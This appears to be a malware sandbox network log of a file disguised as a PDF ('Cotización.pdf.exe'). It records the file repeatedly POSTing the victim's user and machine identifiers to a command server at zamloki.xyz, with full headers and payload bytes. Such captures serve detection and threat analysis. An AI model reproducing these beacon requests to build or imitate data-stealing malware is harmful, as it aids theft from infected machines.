                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    121192.168.2.349860104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:58.763149023 CEST5708OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:58.784677982 CEST5708OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:59.031637907 CEST5709INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zuCsMsQhmLNSfJ8u9HbsiVoOVNfUE8YQHNzhtwAa7Qkx3Vz6PSEWepUJ5QjKEWVYLksi00pTXomKcx4x7VLpTLqB%2BPgBDZqha4HXovJ%2BVg4CXgCBJ5rh%2BpOWB%2B56FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725503959014e92-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    122192.168.2.349861172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:59.310832024 CEST5709OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:59.330698967 CEST5710OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:59.621309042 CEST5710INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JN7V1q3kToggtZIFXysfhcV4KjsIyvue32dsaedduKYcu3LyqC9Gv9qOtpQp3PdRI0XM3OFUSgI7SRnnJ1BXHFIgVwAmfUptT3k%2F4vbeu3aTd7%2BbbBMS18b%2BMWbvcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725503ccf67c2ae-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    123192.168.2.349862172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:59.884037018 CEST5711OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:59.901774883 CEST5712OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:00.228636026 CEST5712INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KZF5b8mRQyRD%2BD2EyvSUpw5ryW4Yj1yy6FtttVFI7GbSza7hOqe3Z44lFEEllpBwMt5f8SNrIUDTwC5AEjUNmu7fqFF3Pxt17CmhFyuIbPVmTgUT5L2irQnhwLHGdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550405f31dfb7-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    124192.168.2.349863104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:03:00.477509022 CEST5713OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:00.497545004 CEST5713OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:00.758980989 CEST5714INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PNOLoCRetRMZ4VDLoE%2BfebkT9uxyZ5v0JJS2Bn1iton2M%2FP2rnAZD16U2CILGXHuDdF4jZUpvvZg9ow6%2BF3Vfa6iVOXiys%2FNMqcyrpAzlDqt%2BvcYX9c9bnr1Uq0v%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550441d76beec-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    125192.168.2.349864104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:03:01.003475904 CEST5715OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:01.021481037 CEST5715OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:01.386045933 CEST5716INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O31d3Zw8KI%2BG%2FKJyUKOoEzk4IvEMq0GNkpsApuc7ZcegtmRF0JjutbP0MLp7sF%2FUO8lkdt3eOMn1n3SQDFadO8%2Fj%2BZXI9l8mMyWok4x7lP4b118l%2FFoD%2FsBnKoj3yw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725504758c86341-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    126192.168.2.349865104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:03:01.658268929 CEST5717OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:01.678421974 CEST5717OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:01.929090023 CEST5718INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9LGwY%2BkT%2FylNJvGu%2Bps80X8SvGEormONXENmJYkJEJ%2B4OxBT2ZYqoCCTZcu5yoKtknrtmGFZ2QWhRlkeHQ0UvuptUcMKwwsqQ8NR%2BARkejAjrmGxXOssZ%2F9s1LuhOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725504b7c8105cc-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    127192.168.2.349866172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:03:02.174887896 CEST5719OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:02.192684889 CEST5719OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:02.470159054 CEST5720INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:02 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ua1fshFzs6bw%2F%2BZdzYSl2g3lfKYNj0AuMQzMfbgLIVQi5i4q5tOEtQzR5xhD8fwe6FAwhKtR%2FPE1qty3JLggP2QOo9YiK%2FWR72%2Bmpi0O2TEKgfhZiIsMJSNsg4FL7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725504ead6f4abd-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    128192.168.2.349867172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:03:02.778872967 CEST5721OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:02.800510883 CEST5721OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:03.069333076 CEST5722INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cS3wI4jaXDuOal43U507uw8iLV06NwC4ylwLt%2BZEoaT%2B5qpRgBM8SEvgGh9xw1JITlZgcOlmefn6sa8roGnJ7A%2BaSY%2BWJb1rRCWsDiu%2FlP1JEMTmcl5KruDvI2L3FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550527c414e19-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    129192.168.2.349868172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:03:03.312508106 CEST5722OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:03.330399990 CEST5723OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:03.713957071 CEST5723INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5W6XLfEcCZS4tftxJwveF0%2BAH2wQ0GghprnmONJpvUfOViJBpWIRKVJFwUOTNvQPm4XvyO2a6mfcwW%2FwQsl%2BB%2FFzRyHO7IE9AB%2BmUEtuK5Sdtyc4ymWIipVquv%2BSwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255055ce3f2c42-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    13192.168.2.349742172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:55.175688028 CEST1311OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:55.195698977 CEST1312OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:55.451536894 CEST1315INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D53vuKu8OfgD0mmYkJ0X5LLwHD1rzD4ET8%2FgpLObMr%2FfUquX%2BnBZUGSBBNrZGhNr%2B4PWIOL0MTg4ZSrcdVy6UnwUsTZed9BZ2vXabnnGzc%2B6u4JC3hdC3Yrt3zMCtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254eabedf905cc-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    130192.168.2.349869104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:03:03.961791039 CEST5724OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:03.981961012 CEST5725OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:04.251977921 CEST5725INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EVYPAYMB9amkWvhu%2B8vGcG%2B20hFEJZFI81mqrffMb%2B2O2205clkMLZIH6N5ZD8D4v6B5%2Bl3NLbjw1%2F9cX3t0gGI9dXzM%2BK8HgJdSbfcLWJ%2BlW7YbNTk87BRHxkSNYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255059df244de2-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    131192.168.2.349870172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:03:04.505611897 CEST5726OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:04.523662090 CEST5727OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:04.784869909 CEST5727INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JkM1jl7fg7yd7AC9S7xXQf8smyZT7mvonkDiyerrPtC80bCcRj9hoAFX9phJ1bMEi5UxoFfwq1njGuoVmM8AGdXUlphvJB0%2BAVrCgoMRoUQ2QSYgf8OVyZ9NsOa%2F8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725505d3e3b4d84-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    132192.168.2.349871104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:03:05.042022943 CEST5728OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:05.062289953 CEST5728OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:05.304625988 CEST5729INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xgue6WVMx4i4bpa23efd7T71X5dUgGXttLN19EURHuVR18BOvEBEgODA7gburxaB6QH973WRU3iz6xm0bzCtp%2BjExLbLe8sHMwu7iU5BMf7pgluKL8CJ681tjGyyag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550609b4b4a97-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    133192.168.2.349872172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:03:05.571856022 CEST5730OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:05.591779947 CEST5730OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:05.941456079 CEST5731INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
